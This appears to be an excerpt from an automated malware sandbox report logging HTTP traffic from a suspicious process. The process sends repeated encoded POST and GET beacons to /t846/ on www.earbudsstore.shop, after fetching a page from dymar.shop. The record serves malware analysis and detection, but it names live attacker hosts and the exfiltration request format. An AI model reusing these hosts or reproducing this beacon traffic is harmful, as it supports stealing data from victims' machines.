                                                                                      Set-Cookie: currency=UAH; expires=Sun, 09-Feb-2025 18:54:31 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      x-ray: wnp32698:0.120/wn32698:0.120/wa32698:D=118787
                                                                                      Data Raw: 34 33 37 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 79 6d 61 72 2e 73 68 6f 70 22 20 2f 3e 20 20 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 [TRUNCATED]
                                                                                      Data Ascii: 4373<!DOCTYPE html>...[if IE]><![endif]-->...[if IE 8 ]><html dir="ltr" lang="ru" class="ie8"><![endif]-->...[if IE 9 ]><html dir="ltr" lang="ru" class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]>...><html dir="ltr" lang="ru">...<![endif]--><head> <link rel="canonical" href="https://www.dymar.shop" /> <meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> !</title><base href="https://www.dymar.shop/" /><link href="catalog/view/javascript/bootstrap/css/bootstrap.min.css" rel="stylesheet" media="screen" /><link href="catalog/view/javascript/font
                                                                                      Jan 10, 2025 19:54:32.152246952 CET1236INData Raw: 2d 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d
                                                                                      Data Ascii: -awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css" /><link href="catalog/view/theme/nice/stylesheet/stylesheet.css" rel="stylesheet"><link href="//fonts.googleapis.com/css?family=Inter:100,100i,300,300i,400,400i,700,700i,900
                                                                                      Jan 10, 2025 19:54:32.152267933 CET1236INData Raw: 6f 6e 74 65 6e 74 3d 22 33 30 30 22 20 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 33 30 30 22 20 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67
                                                                                      Data Ascii: ontent="300" ><meta property="og:image:height" content="300" ><meta property="og:site_name" content="" > </head><body><nav id="top"> <div class="container top-container"> ... Menu Top --><nav id="menu-t
                                                                                      Jan 10, 2025 19:54:32.152280092 CET672INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 63 75 72 72 65 6e 63 79 2d 73 65 6c 65 63 74 20 62 74 6e 20 62 74 6e 2d 6c 69 6e 6b 20 62 74 6e 2d
                                                                                      Data Ascii: <li> <button class="currency-select btn btn-link btn-block" type="button" name="UAH">. </button> </li> <li> <button class="currency-select btn btn
                                                                                      Jan 10, 2025 19:54:32.152293921 CET1236INData Raw: 54 22 20 2f 3e 0a 20 20 3c 2f 66 6f 72 6d 3e 0a 3c 2f 64 69 76 3e 0a 20 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 62 75 74 74 6f 6e 73 2d 2d 69 74 65 6d 22 3e 0a 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74
                                                                                      Data Ascii: T" /> </form></div> <div class="top-buttons--item"> <form action="https://www.dymar.shop/index.php?route=common/language/language" method="post" enctype="multipart/form-data" id="form-language"> <div class="btn-group"> <
                                                                                      Jan 10, 2025 19:54:32.152306080 CET224INData Raw: 65 6d 68 5a 4e 6e 51 30 59 6c 70 54 51 6a 42 48 4d 53 42 44 61 6c 56 68 4d 6d 6f 78 55 56 46 68 53 45 38 30 62 57 4a 4f 55 57 52 7a 65 57 68 44 4f 58 6b 33 62 55 6c 7a 61 44 68 4b 64 6d 31 5a 64 7a 68 6c 56 6c 4e 49 4e 7a 4e 75 61 48 56 6d 4d 46
                                                                                      Data Ascii: emhZNnQ0YlpTQjBHMSBDalVhMmoxUVFhSE80bWJOUWRzeWhDOXk3bUlzaDhKdm1ZdzhlVlNINzNuaHVmMFhsN2t1ODNMRjZkTGl2SGt2T1VXZTNkR2dqVGVVMUZjTVRTMnd3cjNLcUZCWjNQbXc9PSY0SHBoPXRYQ1hrcEtQVCIsInByb3RvY29sIjoiIn0=" /> </form></div>
                                                                                      Jan 10, 2025 19:54:32.152312040 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 63 63 6f 75 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 20 74 6f 70 2d 62 75 74 74 6f 6e 73 2d 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                                                      Data Ascii: <div class="account-container top-buttons--item"> <div class="btn-group dropdown"> <a href="https://www.dymar.shop/index.php?route=account/account" title=" " class="btn btn-link dr
                                                                                      Jan 10, 2025 19:54:32.152316093 CET224INData Raw: 63 68 22 3e 0a 20 20 3c 73 65 6c 65 63 74 20 6e 61 6d 65 3d 22 63 61 74 65 67 6f 72 79 5f 69 64 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 2d 63 61 74 65 67 6f 72 79 2d 73 65 6c 65 63 74 6f 72 22 3e 0a 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76
                                                                                      Data Ascii: ch"> <select name="category_id" class="search--category-selector"> <option value="0"> </option> <option value="1" > </option>
                                                                                      Jan 10, 2025 19:54:32.152328014 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 32 22 20 3e d0 a1 d1 82 d0 b0 d0 bc d0 b5 d1 81 d0 ba d0 b8 20 d0 bf d0 b0 d1 81 d0 b5 d1 87 d0 bd d1 8b d0 b5 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 0a
                                                                                      Data Ascii: <option value="2" > </option> <option value="3" > </option> <option value="4" >
                                                                                      Jan 10, 2025 19:54:32.152339935 CET1236INData Raw: d0 b5 d1 87 d0 b0 d1 82 d1 8b d0 b2 d0 b0 d0 bd d0 b8 d1 8f 20 d1 81 d0 be d1 82 20 28 d1 81 d1 82 d0 be d0 bb d1 8b 29 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e
                                                                                      Data Ascii: ()</option> <option value="14" > &nbsp;- (1,5 )</option> <option value="15" > &nbsp;-
                                                                                      Jan 10, 2025 19:54:32.157206059 CET1236INData Raw: be d1 80 d0 be d1 82 d0 bd d0 b0 d1 8f 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 32 34 22 20 3e 20 26 6e 62 73 70 3b 20 2d 2d 20 d0 9c d0 b5 d0 b4
                                                                                      Data Ascii: </option> <option value="24" > &nbsp; -- 4 - , 540 </option> <option value="25" > &nbsp; -- 3-


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      42192.168.2.550040194.195.220.41804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:37.494205952 CET792OUTPOST /t846/ HTTP/1.1
                                                                                      Host: www.earbudsstore.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.earbudsstore.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.earbudsstore.shop/t846/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 31 64 2f 6a 68 70 42 2b 65 66 4d 70 4c 2f 35 44 49 66 34 63 76 61 7a 55 6a 50 69 7a 6e 4d 30 56 47 61 4a 6a 4a 44 73 53 6a 6c 4e 4f 73 4c 72 43 43 4b 42 74 55 6a 2b 49 69 45 54 32 41 4e 2f 32 72 57 4c 55 38 77 2f 55 39 63 47 5a 4c 41 34 39 2b 49 70 54 49 33 32 6e 42 62 77 7a 31 75 56 37 6d 33 44 4f 51 56 51 49 30 51 7a 63 73 44 79 4b 36 46 70 58 4c 55 78 68 53 51 35 49 68 30 63 6c 57 42 4b 53 71 65 59 34 7a 43 54 70 4f 69 4a 4b 4e 73 50 63 61 70 61 50 79 4d 32 69 74 73 6b 6f 61 72 6f 69 36 46 30 79 42 45 71 49 50 41 47 47 38 6c 71 53 30 38 74 33 53 69 30 46 50 41 44 62 6a 79 6d 4a 6e 70 41 3d
                                                                                      Data Ascii: bbg=1d/jhpB+efMpL/5DIf4cvazUjPiznM0VGaJjJDsSjlNOsLrCCKBtUj+IiET2AN/2rWLU8w/U9cGZLA49+IpTI32nBbwz1uV7m3DOQVQI0QzcsDyK6FpXLUxhSQ5Ih0clWBKSqeY4zCTpOiJKNsPcapaPyM2itskoaroi6F0yBEqIPAGG8lqS08t3Si0FPADbjymJnpA=
                                                                                      Jan 10, 2025 19:54:38.029165983 CET877INHTTP/1.1 200 OK
                                                                                      Server: openresty/1.13.6.1
                                                                                      Date: Fri, 10 Jan 2025 18:54:37 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 32 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 df 73 9a 30 1c c0 df fb 57 30 1e 7a db dd 14 04 ad ba 42 77 9d ad 16 8f 6a 57 9d 0a 2f bd 90 a4 26 36 24 14 82 91 ee f6 bf 0f b1 ad ee ec cb f2 40 f2 fd e6 fb f3 93 10 e7 d3 d5 b8 37 0d ee ae 35 22 63 76 71 e2 6c 27 8d 01 be 74 75 cc f5 8b 13 ad 1c 0e c1 00 ed 96 95 18 63 09 34 48 40 9a 61 e9 ea bf a6 fd 5a e7 d5 72 bf 4d a4 4c 6a f8 39 a7 6b 57 df d4 72 50 83 22 4e 80 a4 11 c3 ba 06 05 97 98 97 be de b5 8b d1 12 1f 79 73 10 63 57 5f 53 ac 12 91 ca 03 07 45 91 24 2e c2 6b 0a 71 ad 12 be 6a 94 53 49 01 ab 65 10 30 ec 36 ea e6 61 38 49 25 c3 17 8e b1 9b ab 76 aa 22 b9 c8 60 4a 13 b9 6f eb e3 da 53 fc 98 e2 8c 1c 94 60 9e e7 29 73 b7 fd 7d 33 0c a5 54 db ac 63 90 46 39 ca 32 29 52 5c cf 88 48 0c 5d 33 f6 91 1d e3 38 9b 53 41 3c a4 74 9c a9 f5 5f 99 1c 63 7f 4c 4e 24 50 a1 09 ce 04 40 ae 8e c4 c3 6e f9 f9 cb 21 9a 1d 00 4d 16 49 c9 5a e2 8d 34 56 60 0d 76 da 03 bb 2d 97 c7 9c 43 49 05 d7 0e 42 69 bf df 69 6e 4d b6 43 51 8e 84 aa 4b 91 d4 99 80 e5 69 0b [TRUNCATED]
                                                                                      Data Ascii: 2ads0W0zBwjW/&6$@75"cvql'tuc4H@aZrMLj9kWrP"NyscW_SE$.kqjSIe06a8I%v"`JoS`)s}3TcF92)R\H]38SA<t_cLN$P@n!MIZ4V`v-CIBiinMCQKi^'e_{`e6NWYsF>k-wm2 ]f..?19bay=a<AWcY#~<#06tpzzZzqX3z.[*?T4``qDVs>F6I`M0Mdt%7w|<$I`o#$~yXgm85ZQ<{f`n_}`-xVOjDQ^SL*}CV+>|kclV\?coscT_/0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      43192.168.2.550041194.195.220.41804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:40.046895027 CET812OUTPOST /t846/ HTTP/1.1
                                                                                      Host: www.earbudsstore.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.earbudsstore.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.earbudsstore.shop/t846/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 31 64 2f 6a 68 70 42 2b 65 66 4d 70 49 66 4a 44 4c 34 45 63 2b 4b 7a 54 74 76 69 7a 6f 73 30 52 47 61 46 6a 4a 42 63 38 6a 33 5a 4f 70 62 62 43 44 49 70 74 56 6a 2b 49 32 55 53 38 4e 74 2f 44 72 57 47 68 38 78 44 55 39 63 69 5a 4c 41 6f 39 2b 62 42 55 4a 6e 33 42 4a 37 77 74 34 4f 56 37 6d 33 44 4f 51 52 35 6c 30 51 72 63 74 79 43 4b 38 6e 42 51 58 45 78 69 52 51 35 49 72 55 63 68 57 42 4c 33 71 66 45 53 7a 45 58 70 4f 69 35 4b 4e 39 50 66 56 70 62 47 73 38 32 7a 71 5a 4a 45 66 4c 63 31 78 45 52 56 51 6c 6e 77 44 57 33 73 6d 48 69 36 6e 63 42 50 43 78 38 79 65 77 69 79 35 52 32 35 35 2b 57 4c 4c 31 4e 67 7a 35 63 64 51 73 72 6d 71 6d 35 6b 67 35 73 79
                                                                                      Data Ascii: bbg=1d/jhpB+efMpIfJDL4Ec+KzTtvizos0RGaFjJBc8j3ZOpbbCDIptVj+I2US8Nt/DrWGh8xDU9ciZLAo9+bBUJn3BJ7wt4OV7m3DOQR5l0QrctyCK8nBQXExiRQ5IrUchWBL3qfESzEXpOi5KN9PfVpbGs82zqZJEfLc1xERVQlnwDW3smHi6ncBPCx8yewiy5R255+WLL1Ngz5cdQsrmqm5kg5sy
                                                                                      Jan 10, 2025 19:54:40.584024906 CET877INHTTP/1.1 200 OK
                                                                                      Server: openresty/1.13.6.1
                                                                                      Date: Fri, 10 Jan 2025 18:54:40 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 32 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 df 73 9a 30 1c c0 df fb 57 30 1e 7a db dd 14 44 ad ba 42 77 ce 56 8b 87 da 55 a7 c2 4b 2f 24 a9 89 0d 09 85 60 a4 bb fd ef 43 6c ab 3b fb b2 3c 90 7c bf f9 fe fc 24 c4 fe 74 3d e9 cd fc bb 1b 8d c8 88 5d 9d d9 bb 49 63 80 af 1c 1d 73 fd ea 4c 2b 86 4d 30 40 fb 65 29 46 58 02 0d 12 90 a4 58 3a fa af 59 bf d2 7e b5 3c 6c 13 29 e3 0a 7e ce e8 c6 d1 b7 95 0c 54 a0 88 62 20 69 c8 b0 ae 41 c1 25 e6 85 af 7b e3 60 b4 c2 27 de 1c 44 d8 d1 37 14 ab 58 24 f2 c8 41 51 24 89 83 f0 86 42 5c 29 85 af 1a e5 54 52 c0 2a 29 04 0c 3b b5 aa 79 1c 4e 52 c9 f0 95 6d ec e7 b2 9d b2 48 2e 52 98 d0 58 1e da fa b8 f6 04 3f 26 38 25 47 25 98 97 59 c2 9c 5d 7f df 0c 43 29 d5 32 ab 18 24 61 86 d2 54 8a 04 57 53 22 62 43 d7 8c 43 64 db 38 cd 66 97 10 8f 29 9d 66 6a fe 57 26 db 38 1c 93 1d 0a 94 6b 82 33 01 90 a3 23 f1 b0 5f 7e fe 72 8c 66 0f 40 93 79 5c b0 96 78 2b 8d 35 d8 80 bd f6 c8 6e c7 e5 31 e3 50 52 c1 b5 a3 50 da ef 77 9a 3b 93 dd 50 94 23 a1 aa 52 c4 55 26 60 71 da 82 [TRUNCATED]
                                                                                      Data Ascii: 2ads0W0zDBwVUK/$`Cl;<|$t=]IcsL+M0@e)FXX:Y~<l)~Tb iA%{`'D7X$AQ$B\)TR*);yNRmH.RX?&8%G%Y]C)2$aTWS"bCCd8f)fjW&8k3#_~rf@y\x+5n1PRPw;P#RU&`qWIhdq};uZ|"_4MmV;VF\HRvW_urn-e`9dtCn7^4'0t`|zqZQ[sz,Y*?T8`kyVc>ZoMd^Znfl2iEIWG,j$~mYg/-83^a4oFM~_^}`-'5nZ(G/omROFoM.7K]6vxn0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      44192.168.2.550042194.195.220.41804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:42.606493950 CET1829OUTPOST /t846/ HTTP/1.1
                                                                                      Host: www.earbudsstore.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.earbudsstore.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.earbudsstore.shop/t846/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 31 64 2f 6a 68 70 42 2b 65 66 4d 70 49 66 4a 44 4c 34 45 63 2b 4b 7a 54 74 76 69 7a 6f 73 30 52 47 61 46 6a 4a 42 63 38 6a 33 68 4f 70 49 54 43 44 75 68 74 54 54 2b 49 71 6b 53 2f 4e 74 2f 65 72 57 4f 36 38 78 4f 68 39 65 4b 5a 4a 6d 6b 39 71 36 42 55 44 6e 33 42 57 72 77 77 31 75 56 75 6d 33 53 48 51 56 6c 6c 30 51 72 63 74 77 61 4b 2f 31 70 51 56 45 78 68 53 51 35 63 68 30 63 46 57 42 44 42 71 66 41 6f 30 30 33 70 4f 43 70 4b 65 66 58 66 63 70 62 49 74 38 33 75 71 5a 4e 62 66 4c 77 50 78 45 30 77 51 69 72 77 41 6a 65 4d 2f 7a 36 54 78 71 6c 34 41 77 6f 53 65 41 2b 77 2f 79 62 44 2b 73 79 47 48 48 52 77 30 70 67 33 55 74 4b 59 37 6a 38 7a 6f 50 42 47 62 75 41 55 6f 6e 31 34 4a 73 57 2b 4d 74 55 34 6d 30 69 41 73 35 34 65 6d 2b 74 76 4d 75 67 51 56 79 34 59 52 72 53 67 4e 38 52 5a 6f 49 6d 51 62 4a 45 46 50 59 55 77 4f 50 58 4e 5a 48 30 44 2b 59 30 4e 44 6f 42 46 61 75 5a 45 5a 32 77 41 68 57 37 67 6f 41 43 53 48 34 46 34 61 67 30 76 65 53 57 58 58 77 62 2b 4a 58 75 62 5a 5a 73 6c 62 73 [TRUNCATED]
                                                                                      Data Ascii: bbg=1d/jhpB+efMpIfJDL4Ec+KzTtvizos0RGaFjJBc8j3hOpITCDuhtTT+IqkS/Nt/erWO68xOh9eKZJmk9q6BUDn3BWrww1uVum3SHQVll0QrctwaK/1pQVExhSQ5ch0cFWBDBqfAo003pOCpKefXfcpbIt83uqZNbfLwPxE0wQirwAjeM/z6Txql4AwoSeA+w/ybD+syGHHRw0pg3UtKY7j8zoPBGbuAUon14JsW+MtU4m0iAs54em+tvMugQVy4YRrSgN8RZoImQbJEFPYUwOPXNZH0D+Y0NDoBFauZEZ2wAhW7goACSH4F4ag0veSWXXwb+JXubZZslbsSRIA4SdaiUCgxbh3IKkVNiYLffDUC7VOQGrjmH709WvOkP8QP1s8mggBv8UxMntMAGhusO6KK/6GIblD7JAheRC8OBsbZVrPgdXSTyeXxZ/AJO4Y2mKUhnv7YhgE86uX4mxDLEe1ro9qTciPI74NouMo5X+pZVgn4Pm0damxnLyVODKscSJkYc8ht9VafFK4cdPjAdM34srbpxysko2GwFnQ14lQeV8tO/nyK6dWAJ7AnMn9yIiIZ9u6AsUjF5xHXq8ry+/862t2eEjXoWh6F1nDrOGmcRlRGxJumsQSu09nlqOafpe/dWPi83aKYPolBxGoH3lG17jtQ5tVf13WHmEh96nTKdOvL0w7cosFcQ8ghbJR1QKhrZ2WPHJ+SZEH9eaSStIuCr/He6swCe0KBWxSYRwH1S4oO10gWcJTN4t2ZdH0nSbniAVQ8Tid0JAh3tUHubahQmeKp0MCi6ZQUbB474S3ah+6WZW0Kn/tExT1Sak61jbuj652ogS51A7MzfD8gQdeyF3TQwu6JqBPYKSEZ2/oc76igS24SOIXu/9I9ilxxFojApQKoRVXCU82ix3zt/3I9KnLYviSaaioO9gqXNfnCFRSaUduJNz9Ua/7URSKASIPALw4xONx8aIz47H9a6qp24aKowhK+B//EjhrLOPFTqryMQ [TRUNCATED]
                                                                                      Jan 10, 2025 19:54:43.102020025 CET877INHTTP/1.1 200 OK
                                                                                      Server: openresty/1.13.6.1
                                                                                      Date: Fri, 10 Jan 2025 18:54:43 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 32 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 cb 52 db 30 14 40 f7 7c 85 eb 05 d3 ce 34 f1 2b 0f 52 6c 3a 34 90 e0 8c 49 28 a4 49 ec 0d 23 4b 22 52 90 25 63 cb 51 4c a7 ff 5e c7 01 92 0e 6c aa 85 a5 7b 75 9f 47 b2 dc 4f 17 93 fe 34 bc b9 d4 88 4c d8 d9 91 bb 9d 34 06 f8 d2 d3 31 d7 cf 8e b4 6a b8 04 03 b4 5b d6 62 82 25 d0 20 01 59 8e a5 a7 ff 9a 0e 1a 27 2f 96 fb 6d 22 65 da c0 4f 05 5d 7b fa a6 51 80 06 14 49 0a 24 8d 19 d6 35 28 b8 c4 bc f2 f5 2f 3d 8c 96 f8 9d 37 07 09 f6 f4 35 c5 2a 15 99 3c 70 50 14 49 e2 21 bc a6 10 37 6a e1 ab 46 39 95 14 b0 46 0e 01 c3 9e d5 34 0f c3 49 2a 19 3e 73 8d dd 5c b7 53 17 c9 45 0e 33 9a ca 7d 5b 1f d7 9e e1 87 0c e7 e4 a0 04 f3 b4 c8 98 b7 ed ef 9b 61 28 a5 ba 66 13 83 2c 2e 50 9e 4b 91 e1 66 4e 44 6a e8 9a b1 8f ec 1a ef b3 b9 35 c4 43 4a ef 33 b5 ff 2b 93 6b ec 8f c9 8d 05 2a 35 c1 99 00 c8 d3 91 b8 df 2d 3f 7f 39 44 b3 03 a0 c9 32 ad 58 4b bc 91 c6 0a ac c1 4e 7b 60 b7 e5 f2 50 70 28 a9 e0 da 41 28 ed f7 1b cd ad c9 76 28 ca 91 50 4d 29 d2 26 13 b0 3a 6d [TRUNCATED]
                                                                                      Data Ascii: 2adR0@|4+Rl:4I(I#K"R%cQL^l{uGO4L41j[b% Y'/m"eO]{QI$5(/=75*<pPI!7jF9F4I*>s\SE3}[a(f,.PKfNDj5CJ3+k*5-?9D2XKN{`Pp(A(v(PM)&:mK4}\L=xWNZ=g [.GL_4p1;~eh1bnu#n j2k?aO[T-dBlbs*UMcZM{E_mx>]%pX -U"*SP.*X-6q2{Vh'M_|`-FyWjLQ_S2GbWMrphsO$8\c{A,ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      45192.168.2.550043194.195.220.41804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:45.155693054 CET528OUTGET /t846/?bbg=4fXDidx2O/QZfth3GLJUvrPztavIjtsHM9AccgwO7Wsf+4yyKbVsNUq9n3baOtbXgE7PgS+t0KauVD8p9LNNPlTmJLw1k/V9vRHWZxkQ6THznCqf0VxFVE5mRi5gyV9wCg==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.earbudsstore.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:54:45.742014885 CET1236INHTTP/1.1 200 OK
                                                                                      Server: openresty/1.13.6.1
                                                                                      Date: Fri, 10 Jan 2025 18:54:45 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Data Raw: 35 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 65 61 72 62 75 64 73 [TRUNCATED]
